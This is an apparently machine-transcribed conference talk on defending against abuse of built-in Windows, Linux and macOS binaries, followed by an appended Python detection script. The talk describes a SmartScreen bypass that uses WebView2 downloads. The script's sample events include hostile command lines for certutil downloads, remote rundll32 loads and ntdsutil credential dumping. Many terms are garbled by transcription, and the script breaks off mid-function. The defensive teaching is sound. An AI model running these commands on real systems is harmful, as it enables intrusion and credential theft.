
Good afternoon everyone. I know after-lunch presentations usually are a little bit sluggish, so welcome to "I Make Them Good Processes Go Bad". I was going to play the audio, you know, "I make them good..." yeah, no, I'm not going to sing it. I might mess with YouTube filters and stuff. So we're going to deep dive on LOLBins and GTFOBins.

Really quick, who here knows what a CYA slide is, what that stands for? Okay. If you don't know what it is, it's just legal disclaimer stuff I have to say, because I don't want you guys to think that this is any of the positions of my current or former employers. This is all me, this is all my personal opinion. I want to tell you guys, just like when it comes to hacking, don't attempt anything in this presentation without prior authorization, especially when it comes to systems you might not own. Make sure you vet everything with the proper legal, HR, management, blah blah blah. Keep your ethics high and don't become what you are defending against.

I always like to include the synopsis slide just in case people have an idea of what this presentation is about and then it really winds up not being it. I don't know how many of you guys are fans of The Office, when Pam winds up in the wrong class and the teacher's just like, nah, sit down. So that's kind of why I include this slide beforehand: if you're, you know, okay, I'm in the wrong presentation, well, you guys have time to leave now. So we're going to talk about LOLBins, GTFOBins and LOOBins. Does anybody know what an LOOBin is? Yeah, this one's pretty new, but we're going to be talking about that. So, a little bit of the history of them. I like to include an "explain like I'm five", because I understand that there's going to be different levels of experience with this stuff, so I always start off with an "explain like I'm five" and then we move on to the attacker and defender perspective, anything that's commonly abused, and then some real world examples and some wrap-ups.

So, a little bit about me. I'm an advanced threat hunter. If you really want to know where, you can look me up on LinkedIn, but I don't like to advertise it because it's really easy to find out where I work, and I like to present as a subject matter expert; it just makes things a little bit easier for me from a legal compliance standpoint. I do a lot of research on the side. If you guys meet up with my boyfriend, he's here, he has to drag me away from the computer sometimes because I spend way too much time on it. But I like to do a lot of research, and because of that research you guys are going to see a LOLBin that has not been disclosed to the LOLBAS project today; about a server of 300 people on Discord know about it, so you guys are getting a sneak peek at that thanks to research. I have some certifications, you know, like the CISSP, Azure Fundamentals, whatever. I am in the top one percent of TryHackMe and I'm currently on a 600 day streak, and if anybody knows how to break streaks please help me, because I don't know how to break this without feeling terrible about myself. But yeah, so, a member of InfraGard. I'm also on the Technology Advisory Board of Grand Island. I like to box; I box out of Casels in Niagara Falls, if you guys want to actually try an old school boxing routine come check me out. I recently did earn my black belt out of there in kickboxing too, so don't mess with the nerd. And then I also do a lot of rocking, and I'm a corporate liaison for the Kia Memorial Market, which is a local charity here that helps veterans in need when it comes to, you know, food or assistance and stuff like that.

So we're getting on to why you're actually here: who knows what a LOLBin is?
In my area? Yep. Do you know what it does, or is it just that you know it exists? Generally you know that badness... yeah, exactly. So the actual definition: executables that are part of an operating system that can be exploited for an attack. In my opinion anything could be a LOLBin, GTFOBin, LOOBin if you try hard enough, probably, which is what I'm finding with my research anyways. So there are a number of different projects that actually track this stuff and we will go through them, and my pointer actually is showing up a little bit. So LOLBins, again it's Windows, and yep, that stands for living off the land binaries, like you explained. GTFOBins, I was always kind of concerned on how to approach this one because I'm sure everybody knows what GTFO stands for, and how do I actually say it in a presentation? So we're just going to go with GTFOBins, and those are Linux binaries. And then LOOBins stands for living off the orchard binaries, and that's a brand new project that involves macOS, and I've seen quite a few Mac devices around here, so this is a good one to get to know, and I will be showing you the website in a little bit.

So before we get really rolling on it, there's a history behind it. Living off the land actually came from a presentation at DerbyCon. Did anybody have the opportunity to go to DerbyCon before it closed? I'm really jealous. DerbyCon was run by TrustedSec. So living off the land first kind of appeared in 2013: Christopher Campbell and Matt Graeber at DerbyCon 3.0. They were talking about pen testing though, so they were talking about, as a pen tester, how do we get away with some of our attacks, and that's where living off the land actually started to churn the masses, I guess. But for years there were so many different names for it. My favorite name is misplaced trust binaries, so that's what people were calling these LOLBins before they were LOLBins. So surrogate programs, proxy binaries, all that sort of stuff. And then, as always, somebody on Twitter (which, infosec Twitter, if you guys aren't a part of it... I'm not going to get into the politics of Twitter; I have a Mastodon, I have a lurker Twitter, it's where I find my information) somebody at a point was just like, hey, can we just come up with a name for these things so we're not all calling it something different? And so the best way to do that was a Twitter poll. So with 40, no, 34, everybody decided on surrogate binaries, but as Twitter happens that didn't stick, because somebody was like, hey, I propose living off the land binaries because I like that name. And then Oddvar Moe, who had heard that from Philip Go, was like, hey, why don't we do living off the land binaries instead of surrogate binaries? And if you don't know Oddvar Moe, he currently works for TrustedSec, I do believe; he is kind of the founder of the projects, more or less. So he proposed that idea and, in Twitter cyber security fashion, there was another poll, and so this poll eventually put it to rest: there were 49 votes and a nice percentage, and history was made. And unlike many cyber security professionals who go "hey, this is a really good idea", he actually picked it up. You know how many times have you guys in your company gone "hey, we should do this" and then nobody implements it because nobody wants to take on the work? So kudos: he ran the final poll, he spread LOLBins far and wide, and then he started documenting it in the LOLBAS project.

So that's a cool story, right? But what do you actually mean by executables that are part of an operating system that can be exploited in an attack? What exactly are they? And this is where we get into the explain like I'm five situation, because if I can't explain it properly to a five-year-old then I'm not doing my job very well. So here to help me explain is everybody's favorite paper clip, Clippy. Wait a minute, I don't own the rights to Clippy, I might get in trouble. So, Clipper to explain. I actually tried a whole bunch of ways to get AI to generate some version of a knockoff Clippy for me and it didn't work out very well, it was really scary. I'll post a couple of those really creepy examples later on. But so here's Clipper to explain; yes, I made him in MS Paint and it was fun. So here's Clipper. He is very helpful, he's built into your operating system, he's here to help you with all your needs. You can trust him because he was there with the system; security knows him. And then unfortunately also this malware knows that he's a thing, but if the malware executes then security will most likely catch on to him. So what's malware to do? Hey Clipper, will you help me? I'm just a normal process. And it's not Clipper's... it's not his prerogative to decide what's normal or what's not; he's just doing what's being asked of him, so he's here to help with all the technical needs. So by executing through this legitimate process he kind of avoids detection, and I put the asterisk there because there are security tools out there that can detect this sort of stuff, so I'm not saying if you instantly work through LOLBins you won't be detected, but security is like, huh, that's weird, but it's Clipper, so that's kind of fine. And then the malware is able to execute. So I know that was a very, very basic idea of it, but again I don't know what level we're working with here; some people might have never heard of a LOLBin before. But the same goes for GTFOBins and LOOBins; it's all the same concept, it's just depending on which operating system you're working through. So again they have legitimate libraries. I included a couple screenshots just trying to familiarize with what we might be working with. So these programs have legitimate uses, like for operating system support, so you can't just shut them off. Instead of packaging
everything together, some malware providers like to use these so it makes their malware smaller and it makes it a little bit easier to smuggle in. So instead of, like, hey, I'll do a phishing campaign... you know, if they manage to get into a system then they might use something else to call their malware in. There's a whole bunch of different ways that you can go about this. The lists are quite long now in the projects, so it's kind of difficult to stay up to date, but that's why, you know, thank you to the Oddvar Moes of the world who keep these projects up to date.

So we're going to clarify what it is, because there's a lot of misconceptions about what actually is a LOLBin, and it's starting to expand a little bit, but traditionally it was a signed file or binary native to the operating system, or one that could be downloaded from the official site. So what I mean by that is, how many of you guys are familiar with the Microsoft suite, where it might have a PsExec or something like that? Sometimes it's natively on operating systems, sometimes you have to download that separately and bring it in. I know a lot of corporations who do that; they kind of install more of a stripped operating system without all the fancy developer tools and then people download them later anyways. So that was the original intent. And then they have to have an unexpected functionality. So when you think about that, if I do a net use to map a network drive, that's what it's used for, so that's not a LOLBin. But if I use mshta, which is used to serve HTA files, but it can also download a remote payload, that's considered a LOLBin because it's not natively used to download payloads. The functionality is also kind of focused on what threat actors and red teams can use, so if it's something that, you know, you're not going to see a threat actor use a particular LOLBin for a reason, then it's not technically a LOLBin. But interesting functions by definition can be executing code, different file operations such as read, write, execute, upload, download, that sort of stuff.

So we're going to check out these sites really quick, because sometimes it helps to see them rather than me just talk about them, so please bear with the transition really quick. My mouse fell asleep. Okay, so this is the LOLBAS project, and it's actually going to be kind of difficult for me to navigate from here. But so each of these is a binary that you can find on Windows; we might just stick with LOLBins for now because Windows is most common. But when you go in you see all these different functions, so what it can be used for. Some of them have many functions; those are ones you want to be a little bit more careful about. And then each of these is also mapped to MITRE ATT&CK, so I know a lot of management, a lot of compliance groups, audit, they'd like to see some sort of framework when it comes to this sort of stuff. So if we just... what's one of my favorite ones? Let's just go to control.exe. So when you go into each of these it gives you a definition of what it is, where it can be found, different resources from the researchers on how it's been abused, and then there's also these things called detections, and Sigma rules. Sometimes you'll see stuff like Elastic; it's all just different detections that the blue team uses to, you know, get rid of this stuff. So this is the actual LOLBin, aka the unexpected functionality: so it can be used to execute alternate data streams, and this here is an example of it. So typically if you see something like this in the logs where it's control.exe, you typically see that as a standalone, but when it's paired with this sort of path to a file calling another binary, that's what the actual malicious execution of it is. So it can be used to evade defenses, to hide, you know, persistence mechanisms and stuff like that. Thank you.

I lost money.

All right, we're going to move back this way.
So I'll show you GTFOBins. The same when it comes to Linux binaries: we have the same situation where you have the binary that's already built into Linux, 7-Zip, what it's meant to do, and then how you can abuse it. Here's LOOBins, which is the macOS version, and this one's relatively brand new. So if you guys are Mac users and you're really knowledgeable with the different Mac binaries, consider actually doing research and submitting it to the orchard project, because like I said it's brand new. Threat actors have compromised Macs; I know everybody likes to think that macOS is super hard and secure, nobody can get past it, but they're slowly turning their attention to it. So this is, again, the Mac project. Hmm.

All right, so why do threat actors use them? Why do red teamers use them? Well, they're kind of stealthy. And I mean, how many blue teamers out there actually know their environment to a T, or know every single binary that exists on a system, and on top of all that know what that binary is supposed to look like in their logs? That's kind of a tall ask. So they like to use these built-in programs to carry out malicious stuff, but take advantage of it by not having to package it in with their code; makes it a little bit more lightweight, makes it easier to abuse the system, more or less, and again it makes it harder for security systems to detect them. And on top of it all, when it comes to programs it's really easy: okay, we don't want TeamViewer in our environment, we'll just block it. Well, you can't exactly block certutil, you can't exactly block command line, you can't necessarily block all this sort of stuff. So they know it's going to be there; if they can figure out what sort of operating system you're running, the tools are already there. So it makes it really fun for them and then makes it really terrible for the defenders.

So how do they ID and exploit? How does a LOLBin become a LOLBin? Research, lots and lots and lots of research. So like I said, fingerprinting an operating system gives them a leg up, and then all you have to do is look at the same sites. You know, they're not just for blue teamers; if they look at the website and are like, okay, well, I didn't know that this binary existed, it's right then and there. So I like this meme in particular. RDP isn't a LOLBin, but it's sort of the same concept where blue teamers are looking for the bad stuff. Okay, like, blue teamers are looking for a Cobalt Strike, they're looking for, you know, a Bitcoin miner; they're not looking for RDP necessarily, because RDP is used throughout your environment. I mean, even if you were like, hey, let's look up who's RDPing where, if you look up rdpclip.exe the amount of logs you're going to get back is going to be terrible, and obviously you can kind of use context if you know your environment well enough, like, okay, maybe a support desk technician should be using RDP, but why is this marketing director? So again it's not super straightforward when it comes to looking for this sort of stuff, but that's kind of a good meme to showcase why it's so difficult.

So let's look at an attack really quick. I chose bitsadmin because it's probably one that you guys should be
aware of. So it's a command line tool where you can download stuff, you can update jobs, and when I was first looking for this in our environment I was like, okay, nobody should be using it, it's probably not that common, and lo and behold people were using it. So what happens typically with a malicious actor is they will come up with some sort of drop file, like a .bat file or an MK file, which downloads another payload, and I don't know if you're going to be able to see this text really well, but they use bitsadmin to transfer basically the payload out of this linked file to call a stager. And again, like we said with bitsadmin, that's kind of its purpose, so this one kind of starts falling into a little bit deeper of a definition of what a LOLBin actually is. But bitsadmin: traditional software, you know, you can probably block typical stuff with a proxy, but how many of you guys are blocking a command shell through your proxy? You know, you're probably using typical Chrome or Firefox, you have your proxy blocks there, but not through command line. So bitsadmin will call the malicious payload, it'll download stuff, and lo and behold you have a whole bunch of badness. And typically they'll use some sort of LOLBin to either call an encryption process, which is what happens with ransomware, as there is an encrypt DLL which is another already built-in product in Microsoft, or it could do a whole bunch of other badness. Like this one calls an interpreter, which, if you guys aren't looking for an interpreter, if you see something like that that's not in an environment where you typically intend to see it, like, you know, your red team using it, then that's another one you want to block.

So this all sounds terrible for the blue team; what can we do? Baseline: figure out what's normal in your environment. There were a lot of LOLBins, there are a lot of GTFOBins, there are a lot of LOOBins listed on that website; it's going to take a while. But what you could do is, if you have any sort of Windows process logs, if you have an EDR system, if you have any of that stuff, just start throwing them in and figure out which ones you never see, and if you never see them then just write a detection like, hey, this should never happen in our environment. You're going to hit a lot of work, unfortunately; like I said, there are processes that get called all the time, there are a lot of executables that get used all the time. If you want to, you can probably start carving those out: okay, our developers are allowed to use that, our system engineers are allowed to use that. It's a lot of work, but trust me, it's worth it in the long run. And then if you don't know, figure out what the existing features are with a product. So let's just say xwizard. So xwizard has a whole bunch of different products or different features you can run, like different flags; maybe it's normal to see a /s or a /x, I'm just making these up off the top of my head, you'll have to go and look at the official Microsoft documentation. And that's my face when I look at the official Microsoft documentation, so I apologize right now, then and there. But so if you see stuff that's typically normal, like, okay, it typically runs in this fashion, it's a scripted job that we can whitelist; if it's anything else then that might be bad. So this is the official documentation, and this is just a screenshot of it, and this is just the server bitsadmin, so there is a separate one. And I know you guys probably want me to focus on some GTFOBins and stuff like that; I'll get into that, but I figure most of you guys are familiar with Windows environments, they're kind of the more common corporate environment, so that's why I'm sticking with this one for now. So you can compare the official documentation to the LOLBAS project, like I said; if you're familiar with the typical use on the server then go in and figure out, okay, this stuff isn't typical, this stuff isn't what we will see. And why do extra work when you don't have to? There's already Sigma rules written. If you guys have a detection engineering team or anybody who works with your SIEM team, point them to that; it still might require some tuning, but I want to sort of walk through a Sigma rule with you guys too. So like I said, don't reinvent the wheel if you don't have to. And this one is going to be really difficult to see, so I'm going to kind of try to point my way
through it. I'll talk a little bit louder so you guys can see it. So this is for a bitsadmin download. As you can see there's different tags and there's different references; you will find a lot of researchers that will be reoccurring in Sigma. Sigma is kind of the detection style that's vendor agnostic, so a lot of people now are writing their rules in Sigma, so that way they can put them into some kind of detection... that way, if you transition SIEM vendors... I know if you guys attended the first presentation, contract watching, he was talking about the headache of this too, is every vendor seems to have their own data structure and different way of doing detections, so a lot of people are now formatting in Sigma as a way to kind of baseline what's across the industry. So, log source: process creation in Windows. A lot of people typically have these kind of Windows logs; if we don't, then we're probably dealing more with EDR; there are ways to translate, but this one's just process create in Windows. So with the detection, it's working off of bitsadmin as the image, so obviously bitsadmin.exe, if you see that run, okay, that's the first condition. And then we'll go to suspicious flags, which are: if you see a command line with transfer in it, okay, that's a little shady. You might have a service account that runs the transfer process, that might be normal, okay, you could probably whitelist the service account that's doing it, but that's one suspicious condition. Other suspicious conditions might be if you see create and addfile in the same command line, so that's another suspicious flag, and then there's an HTTP one in here too, which is, obviously, okay, if you're transferring something from the web that's probably shady. So with all these different things, there's one more, towards "copy bitsadmin.exe". So you might actually see somebody copy this particular executable, where you see a lot with different threat actors where they'll copy these legit binaries to a different location and rename them to try and mask what they're doing. So if you see copy bitsadmin too, that's another, you know, okay, somebody's trying to hide their activity. Like, I copy bitsadmin into a different folder and rename it, and then all of a sudden your blue teamers are going, what's penguin transferring? So but after all that there's conditions, so it might be like, okay, if the first one, if it's bitsadmin and this particular flag, then fire. So you don't have to match all of these; you can play around with the conditional language. And then of course there's different fields that are needed; these are just there to help you with your data dictionaries, so you might have a command line, or you might have process command line, or you might have the parent command line. So that's all stuff that you're going to have to figure out for your environment. And then to see whether or not there are false positives they've seen in their environment and what severity level they represented. So you're going to see some rules where they're like, hey, we didn't see any false positives, but you might see false positives if... so in this case they've assumed that you don't use bitsadmin a lot, but if you do, hey, you're going to see false positives. So that's kind of a walk through a Sigma. If you guys aren't familiar with Sigma I highly recommend checking it out; some of my favorite researchers, like Florian Roth and Mr. Knox, they all contribute to this, and they contribute to the LOLBAS project, so it's people who are working with the "hey, I've identified this as malicious, but also here are rules", so I trust these guys a lot.

All right, more on to what the blue teamers can do. So I know we talked about detections, but that all seems kind of passive, like, okay, so now we're going to be stuck dealing with "hey, an alert went off", now we're in firefighting
mode and we have to battle it out. So is there anything we can do to actually prevent this sort of stuff? So my recommendations are to reduce the chances of an admin level run, because a lot of these have to deal with... a lot of these are successful because people have local admin. And this is going to make a lot of people mad, but your users do not have to be local admin. They don't. I know a lot of people say they have to be, a lot of people say they have to be sudoers users; they don't. And they don't need permissions to write or execute out of System32 necessarily. They might need, they probably need, read access; read access has to be a thing in System32, but they don't need higher rights. So like I said, try to restrict those level permissions, or even when it comes to service accounts: your service account for your application does not need to be domain admin. There are exceptions, because there are a couple that legitimately do; I have seen quite a few, like vulnerability scanners, if they don't have domain admin they kind of, you know, don't run properly. But a lot of developers, they say their system, their application, has to be domain admin, and that's just poor coding. So if you can reduce any of that sort of stuff, if you can use a PAM, like a credential, a higher elevation credential type system... I understand that not everybody has the budget in the world to pull that sort of stuff off, but these are just little things you can do. Utilize a layered defense, think outside the box. So like I said, when it came to, hey, you might block at the proxy so your users can't go to malicious sites, you might do a block where, hey, they can't go to a mega.io to download files and stuff like that, but also make sure that you're blocking PowerShell; like, PowerShell shouldn't go... that might bypass your proxy protections. So there's always a couple ways to get through detections like that, a couple ways to get through preventions too. So of course, you know, if you can do that sort of defense, and then make sure that users aren't admin, and then have antivirus or an EDR on top of it: use a layered defense if you can. Regularly perform purple team assessments. That's one of my favorite things to do as part of my job: I like to be a blue teamer, and then I also like to see, okay, well, we just wrote this rule, how do I get by it? You know, I like to play at that angle a lot. I like to have fun defeating our own defenses. So if you can perform purple team activities, if you can set the time aside for it, I really recommend doing it. And then of course, educate users. I mean, we all know that users are kind of a thorn in our side, but that's part of the business, so if you can train them to do regular phishing activities or understand what's weird... if all of a sudden they see a blip of a black box and they're like, okay, well, that was kind of weird after I clicked on this link on this website, you know, training to recognize that. And definitely don't shame them for reporting. We have a really good system in place where we don't punish people for reporting anything that might be weird; we'd rather have people be safe rather than sorry. And we all know it's going to be a real balance and a real fight between security and business, so like I said, it's not like you can just block everything, as much as we would like to.

Oh wait, there's more. How many of you guys have heard of LOLDrivers? That's another project that's coming up, living off the land drivers. It's a project trying to detail malicious drivers. I don't know if I'll go into a real world example of malicious drivers, but yeah, so if you want to check out another project that's coming down the pipeline, they're tracking anything that has an outstanding vulnerability. There's been a couple high profile attacks that come off of malicious drivers; well, not even malicious drivers, they're just regular drivers that somebody found a way to exploit.

So now we're getting to some of the most commonly abused ones, and these are the ones that I think you guys should know. Obviously it's my opinion; some people might think there are better ones, and there's a couple on here that I hesitate to call LOLBins but other people have called them LOLBins. PowerShell is that one. So PowerShell
is a command line tool, it's a scripting tool, it's designed to be a scripting tool, it's a system administration tool, but it's so heavily abused that people are calling it a LOLBin. I disagree, but I'm saying it anyways. If you can restrict PowerShell users, please do. If you can restrict people from elevating PowerShell command prompts, please do. I understand PowerShell has a lot of uses; maybe you don't necessarily have the tools in place to manage your systems without the use of PowerShell, but make sure you recognize what is normal for PowerShell, and make sure you recognize which users are using it and what they're using it for. But here's a couple other ones. mshta is actually becoming a really popular one because it serves up HTML applications. So what a lot of users will see is, when they click an HTA file, it opens what looks like Microsoft, and it looks like it's a website, but a lot of times it's actually just, you know, it's a disguise. So they'll have you click something, it'll start downloading a package, but that package has already been in there, embedded in the HTA file, which I know sounds kind of convoluted and stuff, but that's a process that's really abused now by threat actors. So if you see LNK to HTA files, that's definitely a sign that you should probably isolate that system. So a couple other ones: certutil; obviously if you don't have a means to serve up your certificates or handle them, things might get really bad; people have used that to download other binaries. bitsadmin, which we talked about. rundll32 is another interesting one. I don't know how familiar you guys are with lower layer DLLs, but they're basically built-in applications that help other applications run, and rundll32 serves up those DLLs. So it gets really convoluted and lower level stuff, but this is one where if you see rundll32 serving up an IP address, that's not right. If you see it serving up a whole bunch of different DLLs that might not be what you want to see, like if you see crypt32.dll and stuff that's running a lot, unless you have a use for it, like you purposely have people who use it to encrypt files and stuff like that, you might want to check that sort of stuff out.

So, GTFOBins. There's a lot of these too, and I figured most people probably aren't super familiar with everything Linux. So chmod is at the top, not just because it's in alphabetical order but because it's really popular with people. chmod can change the permission levels, so let's just say if you are just a lowly level user but you need to have higher elevation to view a file, somebody with higher elevation can use chmod to change the file permissions. But we see that a lot when it comes to people changing executable rights and stuff too. So if I was a bad guy I might bring in a file called badfile.exe.txt, but on a Linux system I might need to use chmod to change that to just an executable file to get my malware to run. So making it something benign will get it through all the filters, but then I'll change it to run my code. crontab, and I don't know if I have time to go through all these, but crontab you see a lot when it comes to scheduling jobs; this is a really popular persistence mechanism, so I would check for this and go, okay, if it's a normal, you know, service account where we have a job that runs every night and it's a batch file job for finance, okay, that's normal, but what is this weird job that's running every 10 minutes that's adding a user into the sudoers file or something of that sort? That might be something that seems a bit fishy. So crontab's another one. curl and wget, which also can be used on Windows, and there's a whole bunch of aliases too, so you might see it as iwr, which is Invoke-WebRequest. So unfortunately you can rename these files too, but this will be used to pull data. So I could use, if I'm on my laptop and I use curl to go to a server, I can pull files that way, but people can also use that to pull stuff from the internet, so if I was like curl GitHub, pull a malicious file, I can use it that way too. So you want to know who's grabbing what with curl or wget. Some other ones that are really fun: GIMP, I know everybody thinks of that as just a photo editing service, but you can do a lot with it, including manipulating data, so that one I thought was fun to mention. And the same with Lua; Lua loads and executes Lua programs, but it can be used to execute a whole bunch of other stuff too. I gotta speed up a little bit. So, LOOBins, going into the Mac. So csrutil, which can configure NetBoot and authenticated root services, so you probably don't want any users touching that; that's probably one of the flags. Like I said, I don't have a ton of familiarity with Mac, but I know a lot of you out there do, so you probably can pick up really quick what I'm laying down. ditto, Pokémon, but actual ditto is used to copy files, so it's kind of, you know, another like x
copy or you know you can use that to you know snag files maybe have different permission levels some of my actual playing around with is it preserves the file attributes which is kind of cool um so I think there'll be probably a bit more research on the how to abuse that in the near future NS curl is like curl and W get whoop which we just went over and then tclsh which is their their shell version um so you can load different plugins and Frameworks without actually requiring signed code which is interesting to me because I know apple is typically really secure with their need for signatures um so you can disable the entitlement and then you can load stuff without
actually requiring that sign which is pretty cool but I know uh been really excited to talk about this one so breaking news how many of you guys are familiar with electronics which are like slack and teams and all that sort of stuff okay they're they're all bends now but more importantly Microsoft Edge webview 2 which helps support these apps that's actually what's vulnerable Mr docs actually he's a well-known researcher he submitted teams and Edge to the Robin's project recently if you go on the GitHub you see it pending right now I imagine it'll be public soon but when it came to the actual Ms web View he we were talking about it in the Discord
Channel and there's less than 300 users in this Discord channel so like I said you guys are kind of some of the first to know um it's not a wild known and he hasn't exactly said if he's going to submit this one or not which can be a little bit Shady but basically what web web Edge view does is it helps service up um your apps so your electron apps your CSE and your JavaScript and all that sort of stuff so it's embedded web Technologies but what you can do is you can use it to download stuff so remember my example where I was like Hey malicious file.exe.txt so you can use webview on launch if I was like writing a piece of
malware if it launched Microsoft Edge it'll instantly start a download and if you use a file extension like dot exe.txt it'll get past smart screen which is kind of scary so if I was a bad actor writing a piece of code and I was like okay well we're going to use webview to go and pull a file from my GitHub called badcode.exe.txt and once that's downloaded my malware is going to strip the txt and execute that exe binary now so it's really cool it's really interesting and a lot of apps are starting to use this webview too so you might want to start vetting this sort of stuff you might want to check out right now which of your electron
apps are normal so what you want to look for is like for example if we use teams or if we use slack I want to go in my logs and see what a typical slack launch looks like I want to look and see what a typical teams launch looks like I want to see what a typical webview looks like if you start seeing HTTP requests to sites that you don't typically see such as GitHub or Mega or any of that sort of stuff that's a red flag like I said I don't know how widely used this is researchers have just kind of come across it so okay fun I I want to throw a couple examples of a
couple high profile hacks I know we're running out of time but so there's so many I could think of but I wanted to keep it to date and this just came out a couple weeks ago sizza put out a report for it on vote Thai food which is a chinese-based threat actor and what was interesting about this one is they relied almost exclusively on living off the land techniques and Hands-On keyboard so a lot of like you know cue bots of the world they'll spam the world and they'll use an automated fashion you can pick out those patterns and they don't change them that often but with Hands-On stuff it's a little bit harder to see because everybody's going to use
stuff a little bit differently so they used um run dll 32 which I mentioned they used that to decode and dump LSS and if you don't have the detection on LSS getting dumped and uh that's kind of a problem I know a lot of bdrs will learn on it now but then they used w-min which is another built-in process to remotely create a domain controller install media and then they'll locally dump all that sort of stuff but again you see and t d s util that's another built-in program you see rundale 32 that's a built-in program you can't really block this stuff you just gotta know what's abnormal and I want to mention spy boy because
this is another one and I don't know if I I'd really 100 consider this a wall then but it could be so there was a threat actor recently called spy boy who was recently advertising a tool called Terminator which will turn off get past any antivirus EDR and they listed like crowdstrike and Defender and semantic and all the big ones and they were charging with like 300 to 3 000 so we all probably were like that's not that's not a thing and it wasn't so it's an actual like bring your own bring your own vulnerable driver attack so the only reason I'm mentioning this is because there is the wall drivers now and technically the
zemna anti-malware driver that he brought in could be considered a woven based on if you have that driver already installed so what happens is this driver is already installed there's a POC code for CB 2021 something like that so what that does is he uses that POC code to hook into this legitimate driver which kills off the user processes so again it could be a well bin if you're running this all ready vulnerable driver so you if I don't know if any of you guys are running this but make sure you check that out bring your own vulnerable driver attacks our like like I said legitimate drivers signed with valid certificates but because drivers can run
with kernel level permissions they they can kill off edrs and stuff like that so it's it's legit but not legit it's not a big thing I think you guys should worry about especially if you don't have local admin rights for your users because it has to be run in admin mode and you have to accept the UAC so I I'd imagine seeing this with insiders maybe but so wrapping up too long didn't listen what did we learn understanding the OS architecture is extremely important for understanding leveling off the land sort of techniques whether it's windows or Linux or Mac um disabling critical Services unfortunately as Security Professionals our biggest protection go-to is let's just block it let's just turn it off and
we can't always do that so detection engineering and baselining are your friends support the projects or at least be familiar with them obviously more stars more attractions more people who take an interest in this sort of stuff we're going to find more of wall bins we're going to find more techniques before the bad guys do we're going to develop the detections first and then just like I said always check them for for regular updates so I know I kind of like swirl brain talked really fast um use Simple ocean if you want to add me on LinkedIn you can find me on Discord and you can figure out my username because I've posted a picture
of the same shirt that I'm wearing now I'm sorry for being vague but that's just kind of the paranoid cyber security professional in me so any questions no I don't have a funny joke I didn't drink before this thank you
[Applause]
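The talk's closing advice is that you cannot block these binaries, so you baseline what is normal and write detections for the abnormal uses it lists (mshta opened from a lure, certutil or rundll32 pointed at a remote target, ntdsutil making install media, curl/wget/iwr pulling from hosts you never see). The script below is an added example, not code from the talk or from the LOLBAS, GTFOBins or LOLDrivers projects: it runs a handful of such rules over constructed process-creation events and counts user/image pairs for baselining. The tab-separated event layout (host, user, parent image, image, command line), the `.example.internal` allowlist and every sample line are assumptions made for the example; the IPs are from the 203.0.113.0/24 documentation range.

```python
"""Triage process-creation events for the LOLBin patterns called out in the talk.

Added example with constructed sample telemetry; the tab-separated layout
(host, user, parent image, image, command line) is an assumption, not any
real EDR or Sysmon export format.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Constructed sample events (not real telemetry). Mixed benign and suspicious uses
# of the same built-in binaries, which is exactly why baselining matters.
SAMPLE_EVENTS = (
    "ws01\tjdoe\texplorer.exe\tmshta.exe\tmshta.exe C:\\Users\\jdoe\\Downloads\\invoice.hta\n"
    "ws01\tjdoe\tcmd.exe\tcertutil.exe\tcertutil.exe -urlcache -split -f http://203.0.113.5/update.txt C:\\Users\\jdoe\\AppData\\Local\\Temp\\u.exe\n"
    "ws02\tsvc_build\tcmd.exe\tcertutil.exe\tcertutil.exe -verify C:\\builds\\signed.cer\n"
    "ws01\tjdoe\tcmd.exe\trundll32.exe\trundll32.exe \\\\203.0.113.9\\share\\x.dll,Start\n"
    "ws03\tadmin1\tpowershell.exe\trundll32.exe\trundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL\n"
    "dc01\tadmin2\tcmd.exe\tntdsutil.exe\tntdsutil.exe ifm \"create full C:\\Temp\\ifm\" quit quit\n"
    "lnx01\twww-data\tbash\tcurl\tcurl -o /tmp/.x https://raw.githubusercontent.com/placeholder/repo/main/tool.txt\n"
    "lnx01\tdeploy\tbash\tcurl\tcurl -sS https://artifacts.example.internal/app-1.2.3.tgz\n"
    "ws02\tjdoe\texplorer.exe\tpowershell.exe\tpowershell.exe iwr https://mega.nz/file/placeholder -OutFile C:\\Users\\jdoe\\Downloads\\a.txt\n"
)

# Hosts the organisation fetches from legitimately (constructed allowlist).
INTERNAL_SUFFIXES = (".example.internal",)
FETCHERS = {"curl", "curl.exe", "wget", "wget.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")  # \\host\share style path
PS_FETCH_RE = re.compile(r"\b(iwr|invoke-webrequest)\b", re.IGNORECASE)


def parse_events(text):
    """Parse tab-separated event lines into ProcEvent records (image names lowercased)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, user, parent, image, cmdline = line.split("\t", 4)
        events.append(ProcEvent(host, user, parent.lower(), image.lower(), cmdline))
    return events


def external_urls(cmdline):
    """URLs in the command line whose host is not on the internal allowlist."""
    found = []
    for m in URL_RE.finditer(cmdline):
        hostname = urlparse(m.group(0)).hostname or ""
        if not hostname.endswith(INTERNAL_SUFFIXES):
            found.append(m.group(0))
    return found


def has_remote_target(cmdline):
    """True if the command line names an IP address, a URL or a UNC path."""
    return bool(IPV4_RE.search(cmdline) or URL_RE.search(cmdline) or UNC_RE.search(cmdline))


# One rule per behaviour the talk describes; each returns True when the event matches.
RULES = [
    # LNK-to-HTA lure: mshta launched from the shell on a file under a user profile
    ("mshta_from_shell", lambda e: e.image == "mshta.exe" and e.parent == "explorer.exe"
     and "\\users\\" in e.cmdline.lower()),
    # certutil used as a downloader instead of for certificate handling
    ("certutil_download", lambda e: e.image == "certutil.exe"
     and ("urlcache" in e.cmdline.lower() or bool(URL_RE.search(e.cmdline)))),
    # rundll32 "serving up" an IP address, URL or UNC path rather than a local DLL
    ("rundll32_remote_target", lambda e: e.image == "rundll32.exe" and has_remote_target(e.cmdline)),
    # ntdsutil creating install-from-media output (the Volt Typhoon pattern)
    ("ntdsutil_ifm", lambda e: e.image == "ntdsutil.exe"
     and bool(re.search(r"\bifm\b", e.cmdline, re.IGNORECASE))),
    # curl/wget/iwr fetching from a host outside the allowlist (GitHub, Mega, ...)
    ("external_fetch", lambda e: (e.image in FETCHERS or bool(PS_FETCH_RE.search(e.cmdline)))
     and bool(external_urls(e.cmdline))),
]


def triage(events):
    """Return one finding per (event, matching rule), in event order."""
    findings = []
    for e in events:
        for name, matches in RULES:
            if matches(e):
                findings.append({"rule": name, "host": e.host, "user": e.user,
                                 "image": e.image, "cmdline": e.cmdline})
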